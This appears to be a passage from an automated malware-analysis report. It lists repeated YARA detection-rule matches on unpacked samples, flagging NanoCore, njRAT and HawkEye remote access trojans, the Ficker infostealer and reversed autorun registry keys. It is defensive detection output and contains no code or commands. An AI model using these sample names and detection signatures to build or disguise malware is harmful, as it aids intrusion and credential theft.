                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.5f65b6.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.d4dd52.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.2.Pluto Panel.exe.7710000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.43de6f.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 11.0.22.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.0.22.exe.530edf.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5839748.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 11.0.22.exe.530edf.22.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.530edf.16.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a2fcfe.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
